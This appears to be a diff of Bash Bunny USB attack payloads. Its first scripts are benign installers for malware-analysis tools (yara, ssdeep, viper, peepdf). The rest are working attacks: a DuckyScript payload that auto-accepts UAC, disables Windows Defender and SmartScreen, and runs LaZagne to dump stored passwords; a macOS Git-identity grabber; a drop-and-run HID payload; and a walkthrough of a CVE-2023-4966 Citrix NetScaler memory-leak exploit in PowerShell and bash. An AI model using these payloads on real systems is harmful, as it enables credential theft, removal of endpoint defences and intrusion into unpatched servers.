# Title: Malware Bunny
|
||||||
|
# Description: peepdf install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
apt-get install -y unzip python-libemu
|
||||||
|
|
||||||
|
cd /tmp/
|
||||||
|
wget http://eternal-todo.com/files/pdf/peepdf/peepdf_0.3.zip
|
||||||
|
unzip peepdf_0.3.zip
|
||||||
|
mv peepdf_0.3 /tools/peepdf
|
||||||
|
cd /tools/peepdf
|
||||||
|
|
||||||
|
#mkdir dpt
|
||||||
|
#cd dpt
|
||||||
|
#wget https://storage.googleapis.com/chrome-infra/depot_tools.zip
|
||||||
|
#unzip depot_tools.zip
|
||||||
|
#cd ..
|
||||||
|
#mv dpt /tools/depot_tools
|
||||||
|
#echo 'export PATH=$PATH:$HOME/../tools/depot_tools' >> ~/.bashrc
|
||||||
|
#gclient
|
||||||
|
#mkdir /tools/v8
|
||||||
|
#cd /tools/v8
|
||||||
|
#fetch v8
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,15 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: punbup install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
cd /tools
|
||||||
|
git clone https://github.com/herrcore/punbup
|
||||||
|
cd punbup
|
||||||
|
python setup.py install
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: main install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
# Install System Dependencies
|
||||||
|
apt-get install -y automake libtool make gcc flex bison libmagic-dev libssl-dev python-dev swig libfuzzy-dev exiftool
|
||||||
|
|
||||||
|
# Install Python Dependencies
|
||||||
|
pip install SQLAlchemy PrettyTable python-magic
|
||||||
|
|
||||||
|
# Other Tools
|
||||||
|
apt-get -y install python-scapy pyew unzip
|
||||||
|
|
||||||
|
# Setup Custom Tools
|
||||||
|
./ssdeep.sh
|
||||||
|
./yara.sh
|
||||||
|
./viper.sh
|
||||||
|
./dshell.sh
|
||||||
|
./capstone.sh
|
||||||
|
./binwalk.sh
|
||||||
|
./featherduster.sh
|
||||||
|
./wabt.sh
|
||||||
|
./peepdf.sh
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: ssdeep install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
cd /tmp
|
||||||
|
|
||||||
|
wget https://github.com/ssdeep-project/ssdeep/archive/release-2.14.1.tar.gz
|
||||||
|
tar xf release-2.14.1.tar.gz
|
||||||
|
rm release-2.14.1.tar.gz
|
||||||
|
mv ssdeep-release-2.14.1/ /tools/ssdeep
|
||||||
|
cd /tools/ssdeep
|
||||||
|
|
||||||
|
./bootstrap
|
||||||
|
./configure
|
||||||
|
make
|
||||||
|
make install
|
||||||
|
|
||||||
|
pip install pydeep
|
|
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: viper install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
cd /tmp
|
||||||
|
wget https://github.com/viper-framework/viper/archive/v1.2.tar.gz
|
||||||
|
tar xf v1.2.tar.gz
|
||||||
|
rm v1.2.tar.gz
|
||||||
|
mv viper-1.2/ /tools/viper
|
||||||
|
|
||||||
|
cd /tools/viper
|
||||||
|
pip install -r requirements.txt
|
|
@ -0,0 +1,15 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: web assembly binary toolkit install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
apt-get install cmake clang
|
||||||
|
|
||||||
|
cd /tools/
|
||||||
|
git clone --recursive https://github.com/WebAssembly/wabt
|
||||||
|
cd wabt
|
||||||
|
make
|
|
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: yara install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
cd /tmp
|
||||||
|
wget https://github.com/VirusTotal/yara/archive/v3.7.0.tar.gz
|
||||||
|
tar xf v3.7.0.tar.gz
|
||||||
|
rm v3.7.0.tar.gz
|
||||||
|
mv yara-3.7.0/ /tools/yara
|
||||||
|
|
||||||
|
cd /tools/yara
|
||||||
|
./bootstrap.sh
|
||||||
|
./configure --enable-magic --enable-dotnet
|
||||||
|
make
|
||||||
|
make install
|
||||||
|
|
||||||
|
pip install yara-python
|
|
@ -0,0 +1,24 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: MalwareBunny
|
||||||
|
# Description: Malware Analysis on Bash Bunny
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
#
|
||||||
|
# LED State Descriptions
|
||||||
|
# Magenta Blinking - setup in progress
|
||||||
|
# Blue Blinking - ready to use
|
||||||
|
|
||||||
|
LED M SLOW
|
||||||
|
|
||||||
|
ATTACKMODE RNDIS_ETHERNET
|
||||||
|
sleep 3
|
||||||
|
|
||||||
|
cd /tools/viper/
|
||||||
|
python web.py -H 0.0.0.0 -p 8080 &
|
||||||
|
|
||||||
|
CUCUMBER ENABLE
|
||||||
|
sleep 3
|
||||||
|
|
||||||
|
LED B SLOW
|
|
@ -0,0 +1,18 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: MalwareBunny
|
||||||
|
# Description: Malware Analysis on Bash Bunny
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
#
|
||||||
|
# LED State Descriptions
|
||||||
|
# Magenta Blinking - setup in progress
|
||||||
|
# Blue Blinking - ready to use
|
||||||
|
|
||||||
|
LED M SLOW
|
||||||
|
|
||||||
|
ATTACKMODE RNDIS_ETHERNET
|
||||||
|
sleep 5
|
||||||
|
|
||||||
|
LED B SLOW
|
|
@ -0,0 +1,6 @@
|
||||||
|
$drivelabel = 'BashBunny'
|
||||||
|
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
|
||||||
|
$filter = 'password_'+ $env:COMPUTERNAME
|
||||||
|
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
|
||||||
|
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
|
||||||
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
|
@ -0,0 +1,90 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Disable Windows Defender and Exfil stored passwords
|
||||||
|
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||||
|
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||||
|
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
# Author: rafa-guillermo
|
||||||
|
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
# Version: 1.2
|
||||||
|
# Category: Credentials
|
||||||
|
# Target: Windows
|
||||||
|
# Tested On: Windows 11
|
||||||
|
# Attackmodes: HID, STORAGE
|
||||||
|
|
||||||
|
# Options
|
||||||
|
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||||
|
|
||||||
|
######## Set-up ########
|
||||||
|
LED SETUP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DRIVE_LABEL=BashBunny
|
||||||
|
|
||||||
|
######## Make Loot Dir ########
|
||||||
|
# Setup named logs in loot directory
|
||||||
|
mkdir -p $LOOTDIR
|
||||||
|
|
||||||
|
####### Open a powershell window with elevated privileges #######
|
||||||
|
LED STAGE1
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
# Disable Windows Defender File Scan and and Real Time Protection
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
|
||||||
|
# Run laZagne
|
||||||
|
LED STAGE2
|
||||||
|
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING \& \$scriptPath
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 10
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
|
||||||
|
# Re-enable Defender and Smart screen
|
||||||
|
LED CLEANUP
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,39 @@
|
||||||
|
# NoDefenseAgainstLaZagne
|
||||||
|
|
||||||
|
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
|
||||||
|
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
* Version: 1.0
|
||||||
|
* Frimware support: 1.1 and higher
|
||||||
|
* Target version: Windows 11
|
||||||
|
* Tested on: Windows 11
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
|
||||||
|
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
|
||||||
|
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
|
||||||
|
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
|
||||||
|
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
|
||||||
|
4. Plug your BashBunny and Enjoy
|
||||||
|
|
||||||
|
|
||||||
|
## Info
|
||||||
|
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
|
||||||
|
|
||||||
|
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
|
||||||
|
|
||||||
|
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||||
|
|
||||||
|
## Disclaimer
|
||||||
|
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
|
||||||
|
|
||||||
|
## Led status
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
|-----------------------------------------------|--------|
|
||||||
|
| Magenta solid | Setup |
|
||||||
|
| Yellow single blink | Attack |
|
||||||
|
| Green 1000ms VERYFAST blink followed by SOLID | Finish |
|
|
@ -0,0 +1,7 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Wake up and do something productive here instead...
|
||||||
|
sleep 10
|
||||||
|
|
||||||
|
# boom!!
|
||||||
|
firefox "http://hak5.org"
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: The Ol'Drop'n'Run
|
||||||
|
# Author: bg-wa
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: HID
|
||||||
|
# Target: UNITY
|
||||||
|
# Attackmodes: HID
|
||||||
|
#
|
||||||
|
# Quick HID only attack to write a file to target machine and open
|
||||||
|
#
|
||||||
|
# | Attack Stage | Description |
|
||||||
|
# | ------------------- | ---------------------------------------- |
|
||||||
|
# | SETUP | Open vi |
|
||||||
|
# | ATTACK | Writing files |
|
||||||
|
# | FINISH | Payload Dropped & ran (remove the bunny) |
|
||||||
|
#
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
|
||||||
|
target_script=\~/fuse.sh
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
DROP $source_script $target_script true true
|
||||||
|
RUN UNITY $target_script
|
||||||
|
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,30 @@
|
||||||
|
<div align="center">
|
||||||
|
|
||||||
|
# Github Information Exfiltration
|
||||||
|
**Get Git user name and email from the Git global config and exfiltrate them**
|
||||||
|
|
||||||
|
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
|
||||||
|
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
|
||||||
|
|
||||||
|
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
|
||||||
|
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
|
||||||
|
|
||||||
|
# Dependency
|
||||||
|
|
||||||
|
* OSX Extension by quentin_lamamy
|
||||||
|
|
||||||
|
# Changelog
|
||||||
|
v1.0 :
|
||||||
|
* :tada: Release on 2023/08/20
|
||||||
|
|
||||||
|
# Contributing
|
||||||
|
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
|
||||||
|
|
||||||
|
# License
|
||||||
|
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
|
||||||
|
|
||||||
|
# Support
|
||||||
|
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
|
|
@ -0,0 +1,58 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: OSX Payload to exfiltrate Git user name and email
|
||||||
|
# Description: Get Git user name and email from the Git global config and exfiltrate them
|
||||||
|
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Exfiltration
|
||||||
|
# Attackmodes: HID STORAGE
|
||||||
|
# Target OS: OSX
|
||||||
|
# Dependency: OSX Extensions
|
||||||
|
#
|
||||||
|
# Magenta solid Setup
|
||||||
|
# Yellow single blink Attack in progress
|
||||||
|
# Yellow double blink Sync
|
||||||
|
# Yellow triple blink Cleanup
|
||||||
|
# Green blink then solid Finished
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
|
||||||
|
|
||||||
|
OSX TERMINAL OPEN
|
||||||
|
|
||||||
|
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'touch $lootPath'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
# Get the user name from the Git global config
|
||||||
|
Q STRING 'user_name=$(git config --global user.name)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
# Get the user email from the Git global config
|
||||||
|
Q STRING 'user_email=$(git config --global user.email)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
# Sync
|
||||||
|
LED STAGE 2
|
||||||
|
sync
|
||||||
|
|
||||||
|
# Cleanup
|
||||||
|
LED STAGE 3
|
||||||
|
|
||||||
|
# Eject
|
||||||
|
QUACK STRING 'diskutil eject $last_mounted_volume'
|
||||||
|
QUACK ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
OSX TERMINAL CLOSE
|
||||||
|
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,193 @@
|
||||||
|
# Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966
|
||||||
|
|
||||||
|
This payload sends an HTTP request to a remote server using the `curl` command. If the request succeeds, it means the exploit was successful. Conversely, if the request fails, it indicates that the target has resisted the attack.
|
||||||
|
|
||||||
|
This payload is a Proof of Concept (POC) based on DuckyScript and is intended for use only in authorized penetration testing. CVE-2023-4966 [[1](#sources)] has been resolved, and I have decided to release this payload only now to minimize the risk of it being used inappropriately. Please use this payload exclusively when you are fully aware of what you are doing and have obtained explicit authorization from the target.
|
||||||
|
|
||||||
|
**Category**: incident-response
|
||||||
|
|
||||||
|
## Index
|
||||||
|
|
||||||
|
- [Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](#exploit-citrix-netscaler-adc-and-gateway-through-cve-2023-4966)
|
||||||
|
- [CVE-2023-4966](#cve-2023-4966)
|
||||||
|
- [Summary](#summary)
|
||||||
|
- [Impacted Products](#impacted-products)
|
||||||
|
- [Settings](#settings)
|
||||||
|
- [DuckyScript Extensions Used](#duckyScript-extensions-used)
|
||||||
|
- [Payload Description Windows](#payload-description-windows)
|
||||||
|
- [Payload Description Linux](#payload-description-linux)
|
||||||
|
- [Script.sh](#script-sh)
|
||||||
|
- [Sources](#sources)
|
||||||
|
- [Credits](#credits)
|
||||||
|
|
||||||
|
## CVE-2023-4966
|
||||||
|
|
||||||
|
Multiple vulnerabilities have been discovered in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway).
|
||||||
|
|
||||||
|
### Summary
|
||||||
|
|
||||||
|
NetScaler ADC and NetScaler Gateway contain unauthenticated buffer-related vulnerabilities mentioned below
|
||||||
|
|
||||||
|
### Impacted Products
|
||||||
|
|
||||||
|
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
|
||||||
|
|
||||||
|
- NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
|
||||||
|
- NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
|
||||||
|
- NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
|
||||||
|
- NetScaler ADC 13.1-FIPS before 13.1-37.164
|
||||||
|
- NetScaler ADC 12.1-FIPS before 12.1-55.300
|
||||||
|
- NetScaler ADC 12.1-NDcPP before 12.1-55.300
|
||||||
|
|
||||||
|
***Note**: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.*
|
||||||
|
|
||||||
|
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
|
||||||
|
|
||||||
|
![](https://i.ibb.co/x7SRvGf/1.png)
|
||||||
|
|
||||||
|
***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
|
||||||
|
|
||||||
|
## Settings
|
||||||
|
|
||||||
|
The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.
|
||||||
|
|
||||||
|
```plaintext
|
||||||
|
HOSTNAME='192.168.1.200'
|
||||||
|
...
|
||||||
|
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Payload Description Windows
|
||||||
|
|
||||||
|
In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$header_value = 'a' * 24576
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, all newline characters ("\n") are removed from the string stored in `$header_value`. This is done to ensure that the string doesn't contain any line break characters.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$header_value = $header_value -replace "\n", ""
|
||||||
|
```
|
||||||
|
|
||||||
|
A variable `$headers` is created, which holds an HTTP header formatted as a string. This header will be used in the subsequent HTTP request.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$headers = "-H 'Host:$header_value'"
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, a variable `$headers` is created as a hashtable containing the HTTP header. In this case, only the "Host" header is used, with the value from `$header_value`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$headers = @{ 'Host' = $header_value }
|
||||||
|
```
|
||||||
|
|
||||||
|
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
|
||||||
|
```
|
||||||
|
|
||||||
|
This `if` statement checks if the first three characters of the HTTP response in the `$response` variable are equal to "200," indicating a successful HTTP response.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
if ($response.Substring(0, 3) -eq "200")
|
||||||
|
```
|
||||||
|
|
||||||
|
If the preceding condition is true, some messages are printed to indicate the beginning of the output.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Write-Host "--- Dumped memory ---"
|
||||||
|
$response.Substring(131050)
|
||||||
|
Write-Host "--- End ---"
|
||||||
|
```
|
||||||
|
|
||||||
|
If the initial condition of the `if` statement is not met, a message is printed, indicating that the machine is not vulnerable.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Write-Host "Could not dump memory"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Payload Description Linux
|
||||||
|
|
||||||
|
This line sets the `header_value` variable to a string containing 24,576 'a' characters. It uses the `yes` command to repeatedly output 'a' and `head` to limit it to 24,576 lines. The `tr` command is used to remove any newline characters, resulting in a long string of 'a's.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, the `headers` variable is constructed with the `-H` option for the cURL command. It sets the 'Host' header to the previously generated `header_value`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
headers="-H 'Host:$header_value'"
|
||||||
|
```
|
||||||
|
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||||
|
```
|
||||||
|
|
||||||
|
In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||||
|
echo "--- Dumped memory ---"
|
||||||
|
echo "$response" | cut -c 131051-
|
||||||
|
echo "The $HOSTNAME is vulnerable!"
|
||||||
|
echo "--- End ---"
|
||||||
|
else
|
||||||
|
echo "Could not dump memory"
|
||||||
|
fi
|
||||||
|
```
|
||||||
|
|
||||||
|
## Script sh
|
||||||
|
|
||||||
|
The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
|
||||||
|
|
||||||
|
Example Execution:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
./script.sh 192.168.1.200
|
||||||
|
```
|
||||||
|
|
||||||
|
Before running the script, you might need to grant execute permissions to the file, as mentioned. You can do this with the following command:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
sudo chmod +x script.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
